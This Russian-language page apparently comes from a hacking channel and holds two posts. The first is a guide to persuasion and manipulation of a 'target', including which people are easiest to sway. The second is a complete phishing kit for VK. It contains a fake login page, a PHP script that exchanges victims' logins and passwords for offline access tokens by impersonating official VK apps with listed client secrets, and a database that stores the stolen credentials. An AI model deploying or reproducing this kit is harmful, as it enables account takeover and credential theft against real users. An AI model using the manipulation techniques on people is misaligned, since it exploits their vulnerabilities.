  • лучше осмысливается то, что преподносится небольшими смысловыми частями (блоками);
  • лучше усваивается то, что вызывает эмоциональный отклик у объекта воздействия;
  • лучше воспринимается, осмысливается и усваивается тот материал, который преподносится в соответствии с национальными традициями восприятия объекта.

 

Убеждение не может сводиться к простому изложению той информации, в правильности которой стремятся убедить противника, и к последующему приведению доводов в ее подтверждение, как того требуют правила формальной логики. Существует гораздо больше способов убеждать людей.

 

Выделяют три основные категории аргументов для убеждения:
  1. Истинные факты. Содержащаяся в тексте сообщения неопровержимая информация настраивает людей на оценку всего текста (в том числе его рекомендаций) как правильного.
  2. Аргументы, дающие психологическое удовлетворение, поскольку они апеллируют к позитивным ожиданиям.
  3. Аргументы, апеллирующие к негативным ожиданиям.

 

По способу представления аргументов различают так называемые «односторонние» и «двусторонние» сообщения.

«Одностороннее сообщение» — это текст, который содержит аргументы только источника информации. Такие сообщения более эффективны в случае, когда объект психологического воздействия не испытывает враждебных чувств по отношению к источнику информации и вдобавок отличается низким уровнем образования. Человек в таком случае способен относительно легко принять точку зрения источника информации. «Одностороннее сообщение» можно также использовать для убеждающего воздействия на людей, имеющих разный образовательный уровень.

«Двустороннее сообщение» содержит как аргументы источника информации, так и контраргументы противника, которые предстоит разоблачить. Такое построение текста служит побудительным мотивом к активной мыслительной деятельности объекта, в результате чего происходит пересмотр ранее сложившихся у него суждений.

«Двустороннее сообщение» ориентировано преимущественно на людей с высоким уровнем образования, испытывающих потребность в сопоставлении различных взглядов, точек зрения, мнений, оценок. «Двустороннее сообщение» в то же время как бы упреждает аргументацию противника и создает предпосылку для выработки определенного иммунитета против нее.

 

Порядок расположения аргументов тоже имеет значение. В частности, будет разумно располагать информацию, непосредственно ориентированную на изменение установки («сильные аргументы»), перед любой другой, не связанной с решением этой задачи. В большинстве случаев наиболее действенным считают расположение «сильных аргументов» в середине текста сообщения (так называемая «пирамидальная модель» воздействия).

Эффективность же текстов с «сильными аргументами», расположенными в начале и в конце сообщения, зависит от установок объекта психологического воздействия. Если он проявляет значительный интерес к теме сообщения (т. е. у него имеются по этому вопросу положительные установки), то более эффективен текст, в котором «сильные аргументы» содержатся в конце сообщения (так называемая «кульминационная модель» воздействия).

Если же человек относится к теме сообщения безразлично, то лучше разместить «сильные аргументы» в начале текста («антикульминационная модель»), чтобы сразу привлечь необходимое внимание.

Воздействие убеждающего сообщения на противника во многом зависит от того, какие призывы (лозунги) в нем подобраны и как они подаются. Различают:

  1. Прямые призывы. Они предполагают убеждение, основанное на предъявлении сильных прямых аргументов.
  2. Косвенные призывы. Представляют собой убеждение путем намеков и обещаний.
  3. Неопределенные призывы. Они побуждают объект самостоятельно прийти к выводам, логически вытекающим из предъявленной ему аргументации, хотя в тексте сообщения отсутствуют конкретные предложения.

 

Осуществление убеждающего воздействия

Для получения максимального эффекта убеждающее воздействие должно соответствовать определенным требованиям:

  1. Быть правильно ориентированным и плановым.
  2. Быть направленным на конкретный объект.
  3. Быть ориентированным преимущественно на интеллектуально-познавательную сферу психики объекта.
  4. Быть направленным на инициирование определенного поведения.

 

Основными принципами осуществления убеждающего воздействия должны быть:

1. Принцип повторения. Многократное повторение сообщения дает такой эффект, который невозможно получить при однократном воздействии.

2. Принцип достижения первичности воздействия. Если объект получил какое-то важное сообщение, то в его сознании возникает готовность к восприятию последующей, более детальной информации, подтверждающей первое впечатление.

3. Принцип обеспечения доверия к источнику информации.

К числу приемов достижения доверия к источнику информации в настоящее время, кроме того, относят:

  • создание имиджа «особой осведомленности» о тех событиях, которые в силу каких-то причин замалчиваются официальными источниками (это достигается передачей фактов, достоверность которых известна или может быть легко проверена);
  • создание имиджа «объективности, независимости и альтернативности», что достигается цитированием документов, оценок экспертов, мнений очевидцев событий и т. д.

4. Принцип активизации психических процессов восприятия объектом содержания информации.

 

Методы воздействия убеждением

Убеждение подразумевает «мягкое» воздействие на человека, ставящее целью радикально скорректировать его взгляды, чтобы повлиять на последующее поведение. Данный вариант является самым этичным способом влияния, ибо здесь нет грубого насилия или внедрения в подсознание объекта.

Метод убеждения используется для:

  • долговременного изменения представлений и установок человека в требуемом направлении;
  • привлечения к сотрудничеству;
  • побуждения объекта к нужному поступку.

 

По техническому исполнению убеждение представляет собой явную, иной раз и скрытую дискуссию, дополняемую неким стимулирующим воздействием.

Каждый человек имеет свой настрой в отношении к чему-либо или кому-либо. Существуют три градации подобного настроя:

  • явная симпатия (склонность к принятию чего-либо);
  • безразличие (с легким смещением в ту или иную сторону);
  • отрицание (неприятие).

 

Всякая попытка грубо навязать желаемое мнение приведет лишь к отрицательному результату, ибо человек всегда сопротивляется ограничению свободы выбора.

Для изменения отношения индивида к чему-либо нужно переориентировать его настрой. Следует учитывать, что:

  • в поединке разума и установки чаще побеждает установка;
  • в ходе перемены установок человеку надо показать направленность и содержание необходимых изменений; все это должно быть им воспринято и понято;
  • изменения произойдут тем успешнее, чем созвучнее они потребностям и мотивациям объекта;
  • проще всего перестраиваются установки, которые не имеют принципиального (жизненно важного) значения для человека;
  • в случае полностью негативной установки ее переориентация обычно требует специальных усложненных методов перепрограммирования психики («промывания мозгов») персоны.

 

В зависимости от условий ситуации и конкретных особенностей объекта, его можно попытаться убедить прямо (в ходе беседы) либо косвенно (через инспирированные акции), действуя при этом:

  • акцентированно-логично;
  • императивно (категорично);
  • эксцитативно (растравливанием эмоций);
  • альтернативно (сведением проблемы к выбору «или-или»).

 

Всякое воздействие содержит в себе элементы внушения и убеждения, но в разных пропорциях. Проще убеждать тех, кто имеет:

  • яркое живое воображение;
  • ориентацию скорее на других, чем на себя;
  • несколько заниженную самооценку (робкие и слабо доверяющие своему собственному мнению субъекты).

 

Трудно поддаются убеждению лица с:

  • явной враждебностью по отношению к другим (проявляемое сопротивление, кстати, часто может возникать как следствие желания доминировать над окружающими);
  • сильным духом критицизма;
  • неизменной готовностью к переиначиванию своих взглядов (проще говоря, стремлением всегда иметь еще одну позицию про запас).

 

Заключение

Сегодня мы разобрали тему убеждения, с достаточно научной точки зрения. Вот что удалось выяснить, исходя из материала выше:

Перед началом общения с "целью", следует добротно подготовить человека с рядом подводящих предварительных бесед с тем, чтобы последующее воздействие не явилось для него неприятной неожиданностью. В противном случае, исход беседы и дальнейшего общения будет отрицательным.


  • Твой TORION
November 25, 2018
by @tor_ion
0
172

Взлом ВК через прямую авторизацию

Суть механизма заключается в том, что мы будем отправлять данные из HTML-форм на сервера вконтакте. В ответ мы получим access token.

Делать мы это будем с помощью cUrl и прямой авторизации через API VK. Выполнять авторизацию будем, представляясь официальным приложением. Запрос на прямую авторизацию выглядит примерно так:


Код:

https://api.vk.com/oauth/token?grant_type=password&client_id=[наше значение]&scope=[наше значение]&client_secret=[наше значение]&username=[наше значение]&password=[наше значение]

Что все это значит:

  • clenit_id - это id нашего приложения. Запишем в client_id значение 2274003.
  • scope - права доступа, необходимые приложению. Усложнять себе жизнь мы не будем, а просто запросим офлайн токен, записав в scope значение "offline". Этого будет достаточно, чтобы входить на страницу ВК по токену через apidog.ru. !Важно: такой токен "живет" до тех пор, пока пользователь не сменит пароль, либо завершит все сессии в настройках безопасности.
  • client_secret - секретный ключ Вашего приложения. Будет равен hHbZxrka2uZ6jB1inYsH
  • username - логин пользователя ВКонтакте
  • password - пароль пользователя ВКонтакте


Варианты официальных clenit_id и client_secret

Android:

client_id: 2274003

client_secret: hHbZxrka2uZ6jB1inYsH


IPhone:

client_id: 3140623

client_secret: VeWdmVclDCtn6ihuP1nt


IPad:

client_id: 3682744

client_secret: mY6CDUswIVdJLCD3j15n


Windows desktop:

client_id: 3697615

client_secret: AlVXZFMUqyrnABp8ncuU


Windows phone:

client_id: 3502557

client_secret: PEObAuQi6KloPM4T30DV


Теперь необходима форма авторизации как в вк.

Создадим php документ authorize.php

authorize.php:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  <head>
  <?php
  $errorGet = $_GET['error_login'];
    if (!$errorGet)
    {
        echo "<style>
        #hide_row_pass {display: none;}
        </style>";
    }
else
    {
        echo "<style>
        #hide_row_pass {display: block;}
        </style>";
    }
  ?>
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <title>ВКонтакте | Вход</title>
    <link rel="stylesheet" type="text/css" href="css/al/common.css?34795707965" /><link rel="stylesheet" type="text/css" href="css/al/fonts_cnt.css?5181750877" />
    <link type="text/css" rel="stylesheet" href="css/api/oauth_popup.css?29651175773"></link>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <link rel="shortcut icon" href="images/icons/favicons/fav_logo_2x.ico?8"></link>
  </head>

  <body class="VK oauth_centered">
    <script>
      if (window.devicePixelRatio >= 2) document.body.className += ' is_2x';
    </script>
    <div class="oauth_wrap">
      <div class="oauth_wrap_inner">
        <div class="oauth_wrap_content" id="oauth_wrap_content">
          <div class="oauth_head">
  <a class="oauth_logo fl_l" href="https://vk.com" target="_blank"></a>
  <div id="oauth_head_info" class="oauth_head_info fl_r">
    <a class="oauth_reg_link" href="https://vk.com/join?reg=1" target="_blank">Регистрация</a>
  </div>
</div>

<div class="oauth_content box_body clear_fix">
  <div class="box_msg_gray box_msg_padded">Для продолжения Вам необходимо войти <b>ВКонтакте</b>.</div>

  <form method="POST" id="login_submit" action="login.php">
    <div class="oauth_form">
  
    <div id="hide_row_pass" class="box_error">Указан неверный логин или пароль.</div>
      <div class="oauth_form_login">
        <div class="oauth_form_header">Телефон или email</div>
        <input type="text" class="oauth_form_input dark" name="login" value="">
        <div class="oauth_form_header">Пароль</div>
        <input type="password" class="oauth_form_input dark" name="password" />
  
        <button class="flat_button oauth_button button_wide" id="install_allow" type="submit" name="submit_login">Войти</button>
        <a class="oauth_forgot" href="https://vk.com/restore" target="_blank">Забыли пароль?</a>
      </div>
    </div>
  </form>
</div>
        </div>
      </div>
    </div>
  </body>
</html>


Архив со всеми картинками и стилями: 
https://yadi.sk/d/186Rs3g68l66SQ
VT: 
https://www.virustotal.com/#/file/b...293d7ad391605c37f64987f0d51b7079348/detection



Выглядеть будет так:


Теперь нужен файл, который будет отсылать логин и пароль на авторизацию и получение токена. Назовем login.php

Но перед этим создадим БД куда будем записывать все валидные данные.


1. Переходим на хостинге в PhpMyAdmin и нажимаем "Создать"


2. Создадим таблицу на 7 столбцов


3. Параметры id, Логин (login), Пароль (password), Токен (token), Дата (date), Имя (first_name) и Фамилия (last_name) зададим как на картинке

В параметрах столбца id должен быть отмечен параметр "A_I" (auto_increment) и стоять PRIMARY KEY.


Теперь сам файл login.php:

<?php
//Создадим headers
$headers = array(
'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'content-type' => 'application/x-www-form-urlencoded',
'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'
);
//Запишем сюда значения логина и пароля из HTML формы
$login = $_POST['login'];
$password = $_POST['password'];
//Если какое-то поле оказалось пустым
if (empty($login) or empty($password))
{
//Отправим пользователя на стартовую страницу authorize и просигнализируем об ошибке
    header('Location: /authorize.php?error_login=true');
    exit;
}
    else
{
//Если все поля заполнены, то посылаем запрос на получение токена по нашей ссылке выше
    $get_token = post ('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.'' ,array(
    'headers' => array(
    'accept: '.$headers['accept'],
    'content-type: '.$headers['content-type'],
    'user-agent: '.$headers['user-agent']
    )
    ));
//Если авторизация прошла успешно
if (preg_match("/[a-z0-9]{85}/", $get_token['headers'], $token))
{
    $token1 = json_decode(file_get_contents('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.''), true);
   $data = json_decode(file_get_contents('https://api.vk.com/method/users.get?user_id='.$token1['user_id'].'&access_token='.$token[0].'&fields=uid,first_name,last_name&v=5.80'), true);

   //Записываем в переменную текущую дату и время сервера
$date_l = date("H:i:s  d-m-Y");
//Подключаемся к БД
    $host="localhost";
    $user=""; //Имя пользователя от MySql
    $pass=""; //Пароль от MySql
    $db_name=""; //Имя базы
    $link=mysql_connect($host,$user,$pass);
    mysql_select_db($db_name,$link);
    mysql_query("set names utf8");
//Выполняем запись валида в БД
    $sql = mysql_query("INSERT INTO vk(login, password, token, date, user_id, first_name, last_name) VALUES('".$login."','".$password."','".$token[0]."','".$date_l."','".$token1['user_id']."','".$data['response'][0]['first_name']."','".$data['response'][0]['last_name']."')");
//Если все прошло успешно, то перенаправляем пользователя на vk.com или на ваш сайт
    if ($sql) {
        session_start();
        $_SESSION['logged_user'] = $data['response'][0]['first_name'];
        header('Location: vk.com/');
//Если при записи обнаружены ошибки, то перенаправим пользователя на главную страницу нашего сайта с сообщением об ошибке
    } else header('Location: /authorize.php?error_login=true');
//Закрываем соединение
mysql_close($link);
exit;
}
//Если авторизация не прошла, то отправим пользователя на стартовую страницу с  ошибкой
else header('Location: /authorize.php?error_login=true');
}
//cUrl POST
function post($url = null, $params = null, $proxy = null, $proxy_userpwd = null) {
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

if(isset($params['params'])) {
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_POSTFIELDS, $params['params']);
}

if(isset($params['headers'])) {
  curl_setopt($ch, CURLOPT_HTTPHEADER, $params['headers']);
}

if(isset($params['cookies'])) {
  curl_setopt($ch, CURLOPT_COOKIE, $params['cookies']);
}

if($proxy) {
  curl_setopt($ch, CURLOPT_PROXY, $proxy);

  if($proxy_userpwd) {
   curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy_userpwd);
  }
}

$result = curl_exec($ch);
$result_explode = explode("\r\n\r\n", $result);

$headers = ((isset($result_explode[0])) ? $result_explode[0]."\r\n" : '').''.((isset($result_explode[1])) ? $result_explode[1] : '');
$content = $result_explode[count($result_explode) - 1];


preg_match_all('|Set-Cookie: (.*);|U', $headers, $parse_cookies);

$cookies = implode(';', $parse_cookies[1]);

curl_close($ch);

return array('headers' => $headers, 'cookies' => $cookies, 'content' => $content);
}
?>

В переменные $host="localhost";

$user=""; //Имя пользователя от MySql

$pass=""; //Пароль от MySql

$db_name=""; //Имя базы

вписываем наши данные


На 50 строчке если авторизация прошла успешно, нужно перенаправить пользователя на ваш сайт или куда вам угодно.

header('Location: "Ваш сайт" ');

Осталось залить все файлы на хостинг и можно фишить.


  • Твой TORION
November 24, 2018
by @tor_ion
0
1 242
Show more